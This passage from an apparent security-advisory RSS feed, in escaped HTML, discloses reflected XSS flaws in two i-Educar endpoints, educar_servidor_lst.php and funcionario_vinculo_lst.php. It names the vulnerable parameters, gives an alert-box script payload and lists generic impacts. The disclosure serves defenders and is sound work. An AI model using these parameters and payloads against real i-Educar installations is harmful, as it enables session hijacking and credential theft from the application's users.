    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8366/image.png&amp;#34;
	width=&amp;#34;863&amp;#34;
	height=&amp;#34;1056&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8366/image_hu_6199b9aaaa300864.png 480w, /p/cve-2025-8366/image_hu_e3f7025ac01bf0a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;196px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8366-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_servidor_lstphp&amp;#34;&amp;gt;CVE-2025-8366: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_sevidor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8366/image.png&amp;#34;
	width=&amp;#34;863&amp;#34;
	height=&amp;#34;1056&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8366/image_hu_6199b9aaaa300864.png 480w, /p/cve-2025-8366/image_hu_e3f7025ac01bf0a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;196px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8367</title>
        <link>https://www.cvehunters.com/p/cve-2025-8367/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8367/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8367-cross-site-scripting-xss-reflected-in-endpoint-funcionario_vinculo_lstphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8367: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8367/image.png&amp;#34;
	width=&amp;#34;847&amp;#34;
	height=&amp;#34;702&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8367/image_hu_facf55028aaff81d.png 480w, /p/cve-2025-8367/image_hu_e1b6305ab119a43a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;120&amp;#34;
		data-flex-basis=&amp;#34;289px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8367-cross-site-scripting-xss-reflected-in-endpoint-funcionario_vinculo_lstphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8367: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8367/image.png&amp;#34;
	width=&amp;#34;847&amp;#34;
	height=&amp;#34;702&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8367/image_hu_facf55028aaff81d.png 480w, /p/cve-2025-8367/image_hu_e1b6305ab119a43a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;120&amp;#34;
		data-flex-basis=&amp;#34;289px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
